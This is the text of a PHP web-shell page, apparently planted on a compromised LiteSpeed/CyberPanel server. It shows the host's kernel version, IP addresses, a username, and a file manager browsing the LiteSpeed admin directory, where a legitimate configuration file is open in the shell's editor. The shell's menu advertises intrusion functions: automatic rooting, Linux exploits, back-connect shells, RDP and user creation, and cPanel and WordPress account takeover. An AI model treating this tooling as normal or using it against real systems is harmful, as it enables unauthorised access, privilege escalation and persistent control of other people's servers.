Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
admin /
html.open /
view /
[ HOME SHELL ]
Name
Size
Permission
Action
inc
[ DIR ]
drwxr-xr-x
UIBase.php
10.79
KB
-rw-r--r--
UIProperty.php
1.16
KB
-rw-r--r--
ajax_data.php
7.74
KB
-rw-r--r--
compilePHP.php
16.21
KB
-rw-r--r--
confMgr.php
938
B
-rw-r--r--
dashboard.php
19.07
KB
-rw-r--r--
logviewer.php
5.31
KB
-rw-r--r--
realtimestats.php
17.3
KB
-rw-r--r--
serviceMgr.php
739
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : confMgr.php
<?php require_once("inc/auth.php"); $disp = Service::ConfigDispData(); $page = DPageDef::GetPage($disp); UI::PrintConfPage($disp, $page); ?> <script type="text/javascript"> pageSetUp(); var pagefunction = function() { // clears memory even if nothing is in the function var rospan = $("#readonlynotice"); <?php if (defined('_CONF_READONLY_')) { $alert_str = '<i class=\"fa fa-bell\"></i> ' . DMsg::UIStr('note_readonly_mode'); ?> rospan.html("<?php echo $alert_str;?>"); if (rospan.hasClass("hide")) rospan.removeClass("hide"); <?php } else { ?> rospan.html(""); if (!rospan.hasClass("hide")) rospan.addClass("hide"); <?php } if (Service::HasChanged()) { ?> var span = $("#restartnotice"); if (span.hasClass("hide")) span.removeClass("hide"); <?php } ?> }; // end pagefunction // run pagefunction on load pagefunction(); </script>
Close